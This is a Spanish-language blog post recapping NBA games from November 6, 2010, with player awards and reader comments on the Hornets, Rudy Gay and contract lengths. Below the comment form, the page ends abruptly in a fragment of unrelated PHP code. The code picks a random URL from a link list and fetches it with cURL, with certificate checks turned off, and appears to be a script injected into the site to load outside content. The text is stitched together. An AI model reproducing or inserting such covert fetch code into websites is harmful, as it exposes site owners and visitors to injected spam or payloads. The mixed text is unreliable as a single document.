La Crónica (06/11/2010)

07 de November de 2010 por Viva_Dirk

Noche intensa de sábado que comenzaba con la victoria de Cleveland en la capital. Los Cavs siguen compitiendo decentemente sin Jamison y anoche tuvieron bastante con Mo Williams y Gibson para ganar a unos Wizards donde Jianlian y Young parecen infrautilizados y Wall&Arenas buscan la manera de coexistir. Los Magic tuvieron que sudar para ganar a los Bobcats y necesitaron el primer buen partido de Lewis para ello. El partidazo de Gerald Wallace no le sirvió a Charlotte para ganar. Por su parte, Miami ganó a los Nets en un brillante tercer cuarto en el que Lebron jugó de base a gran nivel.

San Antonio ganó en la prorroga a Houston. Los Rockets no arrancan y anoche se les lesionó Brooks. En los Spurs muy bien el trio calavera acompañados de Jefferson. Los Hornets se mantienen imbatidos y anoche su víctima fueron los Bucks. Paul está muy sólido y así el resto de sus compañeros lo tienen más fácil. Denver ganó en Dallas con un buen Melo y 40 puntos del banquillo.

Los Clippers se dejaron remontar por los Jazz después de un partido con 2 prórrogas y Griffin expulsado por faltas. Los Clippers ya piensan en traspasar a Baron Davis. Veremos quien quiere los 42 millones que le quedan por cobrar en 3 años. Portland no tuvo problemas con Toronto y bastó con un buen partido del quinteto titular. Rudy no jugó y huele a traspaso. Cerraron las noche los Grizzlies ganando en Sacramento. Rudy Gay y Zach Randolph fueron demasiado para Tyreke Evans.

PREMIOS TJNBA

MVP: Tras una dolorosa derrota, Rudy Gay sacó la rabia ante Sacramento a los que apuntilló con 32 puntos, 9 rebotes y 3 asistencias. Dwyane Wade y Deron Williams también lideraron a sus equipos a la victoria con 29 puntos y 10 rebotes, y 30 puntos, 8 rebotes y 7 rebotes, respectivamente.

Rookie: Si juega Blake Griffin es muy complicado que no lo nombremos en es esta sección. 16 puntos y 17 rebotes. Si sigue a este nivel marcará época. John Wall, su máximo rival para el ROY, se quedó en 13 puntos y 10 asistencias pero con 6 pérdidas.

Sorpresa: Tras un inicio dubitativo, Anthony Morrow explotó ayer con 25 puntos y 7 rebotes. Los Nets necesitarán muchas noches como esta.

Decepción: Tras unos más que correctos Playoffs, JJ Redick ha comenzado la temporada a un nivel deplorable. Anoche, sólo jugó 7 minutos en los que quedó sin anotar.

Esfuerzo en vano: Comprobar como 30 puntos, 8 rebotes, 5 asistencias y 4 robos caen en saco roto es algo muy duro. Anoche le tocó sufrirlo a Tyreke Evans y es que enfrente se encontró con un Rudy Gay en estado de gracia.

Comenta

10 comentarios a esta entrada

  1. sergio dice:
    #1

    Lo de NOH va más allá de ganar 6 partidos. Lo realmente sorprendente es que han sido victorias ante Bucks(x2), Rockets, Spurs, Heat y Nuggets. Posiblemente estén en la división más complicada, pero lo están haciendo francamente bien. Por ejemplo, los Lakers han ganado a Warriors, Grizzlies, Kings y Raptors…

      Citar

  2. troll dice:
    #2

    NO 6-0 y hoy juegan los Kniks a las 7,buena hora para verlos .

      Citar

  3. -=TheKing=- dice:
    #3

    Como New Horleans no tenga lesiones y consiga un pivot en condiciones, o un pivot que tenga facilidad para anotar en el juego estático va hacer una buena temporada. Esperemos que CP3 aguante sano.

      Citar

  4. Tiago dice:
    #4

    Paul como siempre dando lecciones, si lo defienden ”jugadores” como jennings lo tiene aun mas fácil. Bucks dando pena, Bogut está mas solo que la una…tanto equipazo que parecían que tenian…

    Y Spurs sufriendo como casi siempre…Ginobili es un genio y Parker genial también. Duncan empezó fallandolo todo pero al final fundamental como siempre! y lo de Jefferson no tiene nombre, esperemos que no sea una simple racha y vuelva a ser el que era. Como Splitter cuaje y deje los complejos de lado cuidadito con Sas…

      Citar

  5. aro_pasado_no_newtoniano dice:
    #5

    ¿cuándo aprenderá Jennings?

      Citar

  6. troll dice:
    #6

    Okafor es un buen pivot.

      Citar

  7. Scriers dice:
    #7

    Le vamos a tener que ir reconociendo a rudy gay no solo que justifica su contrato, sino que esta haciendo actuaciones brutales casi cada noche. Pasa igual de poco, pero va sobrado de recursos. En fin, creo que a memphis le falla la defensa y su peor enemigo puede ser el conformismo. Gente con contratos altos asegurados y ausencia de presion. Solo un gran inconformsismo y caracter ganador valdria para dar un plus. Quienes podran hacerlo? Eso es otro cantar.

      Citar

  8. Rompe dice:
    #8

    Sería divertido limitar la duración máxima de los contratos. Obviamente esto no va a pasar, pero imagínate que sólo se pudieran hacer contratos con 2 años de duración. Todos jugarían al 100% siempre, no habría jugadores sobrepagados como T-Mac o Jermaine el año pasado y habría mucha más rotación entre los equipos, los procesos de reconstrucción serían más rápidos… Yo lo firmaba!

      Citar

  9. scriers dice:
    #9

    Bueno Rompe, un contrato se hace bajo el rendimiento de un tío que juega y es como una señal de confianza. Deben respetarse. Contratos a dos años no garantizaría ninguna estabilidad y todo sería un caos. Yo lo prefiero como está, quizás lo que limitaría son los salarios, de manera que no se sobrepagara a nadie. Y que hubiera algunas clausula compensatoria.

      Citar

  10. Rompe dice:
    #10

    Está claro que a la larga sería una locura y se volverían todos locos, jugadores y GM´s. Pero de entrada sería divertidísimo jeje.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>